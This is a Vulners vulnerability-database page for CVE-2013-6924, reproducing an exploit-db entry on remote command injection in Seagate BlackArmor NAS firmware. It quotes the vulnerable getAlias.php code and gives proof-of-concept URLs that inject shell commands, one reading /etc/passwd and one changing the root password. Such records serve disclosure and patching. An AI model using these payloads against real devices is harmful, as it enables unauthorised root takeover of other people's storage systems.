Vulners
Lucene search
Seagate BlackArmor NAS sg2000-2000.1331远程代码执行漏洞
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution | 6 Jan 201400:00 | – | zdt |
 | CVE-2013-6924 | 11 Oct 201712:00 | – | cve |
 | CVE-2013-6924 | 11 Oct 201712:00 | – | cvelist |
 | Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution | 6 Jan 201400:00 | – | exploitdb |
 | Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution | 6 Jan 201400:00 | – | exploitpack |
 | CVE-2013-6924 | 11 Oct 201712:29 | – | nvd |
 | Seagate BlackArmor NAS Multiple Vulnerabilities | 6 Jan 201400:00 | – | openvas |
 | Seagate BlackArmor NAS sg2000-2000.1331 Remote Command Execution | 6 Jan 201400:00 | – | packetstorm |
 | Design/Logic Flaw | 11 Oct 201712:29 | – | prion |
 | Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution | 1 Jul 201400:00 | – | seebug |
10
# Exploit Title: Seagate BlackArmor NAS - Remote Command Execution
# Google Dork: N/A
# Date: 04-01-2014
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: <http://www.seagate.com/> http://www.seagate.com/
# Software Link:
<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
>
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
# Version: sg2000-2000.1331
# Tested on: N/A
# CVE : CVE-2013-6924
#
## Description:
#
# The file getAlias.php located in /backupmgt has the following lines:
#
# $ipAddress = $_GET["ip";
# if ($ipAddress != "") {
# exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt");
# ..
# ..
# }
#
# The GET parameter can easily be manipulated to execute commands on the
BlackArmor system.
#
## Proof of Concept:
#
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your
command here>;
#
## Example to change the root password to 'mypassword':
#
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo
'mypassword' | passwd --stdin;
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Jan 2014 00:00Current
9.6High risk
Vulners AI Score9.6
EPSS0.48357